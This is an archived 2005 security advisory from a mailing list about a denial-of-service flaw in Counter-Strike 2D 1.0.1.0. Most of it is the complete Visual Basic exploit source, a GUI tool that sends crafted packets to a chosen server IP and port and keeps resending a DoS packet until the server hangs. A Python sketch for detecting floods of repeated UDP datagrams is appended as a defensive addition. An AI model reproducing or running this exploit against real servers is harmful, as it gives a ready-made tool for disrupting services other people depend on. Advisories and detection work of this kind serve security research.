Tuesday, September 13, 2005

[EXPL] Counter Strike 2D DoS (Exploit)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

Counter Strike 2D DoS (Exploit)
------------------------------------------------------------------------

SUMMARY

"Counter-Strike 2D <http://www.cs2d.com/> is a 2D Clone of the most
famous Multiplayer Game ever: Counter-Strike by Valve Software."
Sending crafted packets causes Counter Strike 2D to enter a DoS
condition.

DETAILS

Vulnerable Systems:
* Counter Strike 2D Windows version 1.0.1.0 and prior

By repeating the same packet more than once, Counter Strike 2D will enter
a loop and will stop responding after the packet has been sent several times.

Exploit:
VERSION 5.00
Object = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0"; "MSWINSCK.OCX"
Begin VB.Form frmMain
BorderStyle = 4 'Fixed ToolWindow
Caption = "CS2D DoS - tHa_imaX"
ClientHeight = 2160
ClientLeft = 45
ClientTop = 315
ClientWidth = 3195
BeginProperty Font
Name = "Verdana"
Size = 8.25
Charset = 0
Weight = 400
Underline = 0 'False
Italic = 0 'False
Strikethrough = 0 'False
EndProperty
Icon = "frmMain.frx":0000
LinkTopic = "Form1"
MaxButton = 0 'False
MinButton = 0 'False
ScaleHeight = 2160
ScaleWidth = 3195
ShowInTaskbar = 0 'False
StartUpPosition = 3 'Windows Default
Begin VB.CommandButton cmdAttack
Caption = "[Attack]"
Height = 285
Left = 45
TabIndex = 9
Top = 1545
Width = 3090
End
Begin VB.Frame Frame1
Caption = "Attack Settings"
Height = 1560
Left = 45
TabIndex = 0
Top = -15
Width = 3105
Begin VB.TextBox txtName
Alignment = 2 'Center
Appearance = 0 '2D
Height = 285
Left = 1305
TabIndex = 8
Text = "jack_lalane"
Top = 1230
Width = 1740
End
Begin VB.TextBox txtPC
Alignment = 2 'Center
Appearance = 0 '2D
Height = 270
Left = 1305
TabIndex = 6
Text = "50"
Top = 810
Width = 1740
End
Begin VB.TextBox txtPort
Alignment = 2 'Center
Appearance = 0 '2D
Height = 285
Left = 1305
TabIndex = 4
Text = "36963"
Top = 510
Width = 1740
End
Begin VB.TextBox txtIP
Alignment = 2 'Center
Appearance = 0 '2D
Height = 285
Left = 1305
TabIndex = 2
Text = "127.0.0.1"
Top = 210
Width = 1740
End
Begin VB.Label Label4
Caption = "Player Name:"
Height = 210
Left = 60
TabIndex = 7
Top = 1260
Width = 1185
End
Begin VB.Label Label3
Caption = "Packet Count:"
Height = 210
Left = 60
TabIndex = 5
Top = 840
Width = 1245
End
Begin VB.Label Label2
Caption = "Server Port:"
Height = 210
Left = 60
TabIndex = 3
Top = 525
Width = 1065
End
Begin VB.Label Label1
Caption = "Server IP:"
Height = 210
Left = 60
TabIndex = 1
Top = 240
Width = 960
End
End
Begin MSWinsockLib.Winsock wS
Left = 2865
Top = -45
_ExtentX = 741
_ExtentY = 741
_Version = 393216
Protocol = 1
End
Begin VB.Label lblS
Caption = "DoS Loaded..."
Height = 255
Left = 45
TabIndex = 10
Top = 1905
Width = 3090
End
End
Attribute VB_Name = "frmMain"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
'***WRITTEN BY tHa_imaX [tHa_imaX@yahoo.de]
'***23.08.2005
'***NEED A JOINT NOW ;)

Dim ConnectionPacket As String ' Declare our Connection String
Dim DoSPacket As String ' Declare our DoS Packet
Dim pC As Integer ' Packet Count
Private Sub cmdAttack_Click()
'First we define the Connect Packet
ConnectionPacket = Chr(Val("&hFA")) & Chr(Val("&hFA")) & _
Chr(Val("&h0D")) & Chr(Val("&h0A")) & _
"<name>" & _
Chr(Val("&hCE")) & Chr(Val("&h7B")) & Chr(Val("&hE2")) & _
Chr(Val("&h45")) & Chr(Val("&h63")) & Chr(Val("&h90")) & _
Chr(Val("&h00")) & Chr(Val("&h00"))

'Second, we define our DoS Packet
DoSPacket = Chr(Val("&hFA")) & Chr(Val("&h04")) & _
"<name>" & _
Chr(Val("&h0D")) & Chr(Val("&h0A")) & Chr(Val("&h02"))

'Now we prepare the packets (insert our playername)
ConnectionPacket = Replace(ConnectionPacket, "<name>", txtName.Text)
DoSPacket = Replace(DoSPacket, "<name>", txtName.Text)

'Set the pC to zero
pC = 0

'Lets send the First Packet to tell the server who we are
wS.RemoteHost = txtIP.Text
wS.RemotePort = Val(txtPort.Text)
wS.SendData ConnectionPacket
End Sub

Private Sub wS_DataArrival(ByVal bytesTotal As Long)
On Error Resume Next ' Ignore Errors

'Count the Packets to Cancel the attack after the packetcount value
pC = pC + 1
If pC >= Val(txtPC.Text) Then
lblS.Caption = "Done."
Exit Sub
End If
lblS = "Total Packets: " & pC

'Dim tmp As String
'wS.GetData tmp
'Debug.Print tmp


'Send the DoSPacket whenever the server sends something => loop
wS.SendData DoSPacket

'Handle Errors
If Err <> 0 Then
MsgBox Err.Description
pC = Val(txtPC.Text)
End If
End Sub

'EoF
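
A detection sketch for the behaviour described above, added here and not part of the original advisory or the exploit author's code: it flags any source that sends the same UDP datagram to the server port many times inside a short window. Port 36963 and the layout of the repeated packet come from the listing above; the window, threshold, addresses, player name and sample traffic are constructed assumptions.

```python
from collections import defaultdict, deque

CS2D_PORT = 36963      # server port shown in the exploit form on this page
WINDOW_SECONDS = 2.0   # assumption: sliding window length
MAX_REPEATS = 5        # assumption: identical datagrams tolerated per window

def find_repeat_floods(packets, window=WINDOW_SECONDS, max_repeats=MAX_REPEATS):
    """packets: iterable of (timestamp, src_ip, dst_port, payload_bytes).
    Returns {(src_ip, payload): peak_count} for every source that sent the
    same payload to the CS2D port more than max_repeats times per window."""
    recent = defaultdict(deque)   # (src, payload) -> timestamps still in window
    flagged = {}
    for ts, src, dport, payload in sorted(packets, key=lambda p: p[0]):
        if dport != CS2D_PORT:
            continue
        seen = recent[(src, payload)]
        seen.append(ts)
        while ts - seen[0] > window:      # expire timestamps outside the window
            seen.popleft()
        if len(seen) > max_repeats:
            flagged[(src, payload)] = max(flagged.get((src, payload), 0), len(seen))
    return flagged

# Constructed sample traffic (documentation addresses, made-up player name).
# REPEATED follows the layout of the second packet in the listing above.
REPEATED = b"\xfa\x04" + b"player1" + b"\r\n\x02"

def sample_packets():
    pkts = []
    # Source A: the same datagram 50 times, 20 ms apart.
    pkts += [(10.0 + i * 0.02, "203.0.113.7", CS2D_PORT, REPEATED) for i in range(50)]
    # Source B: ordinary play, every datagram different (placeholder bytes).
    pkts += [(10.0 + i * 0.05, "198.51.100.20", CS2D_PORT, b"\x01" + bytes([i])) for i in range(30)]
    # Source C: the same datagram resent slowly, one per second, under the limit.
    pkts += [(10.0 + i, "192.0.2.44", CS2D_PORT, REPEATED) for i in range(10)]
    return pkts

if __name__ == "__main__":
    for (src, payload), peak in find_repeat_floods(sample_packets()).items():
        print(f"{src}: {peak} identical datagrams within {WINDOW_SECONDS}s: {payload!r}")
```

The same per-source counter can sit in front of a server's receive loop to drop duplicates rather than only report them.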

ADDITIONAL INFORMATION

The information has been provided by <mailto:the_imax@yahoo.de> X X.
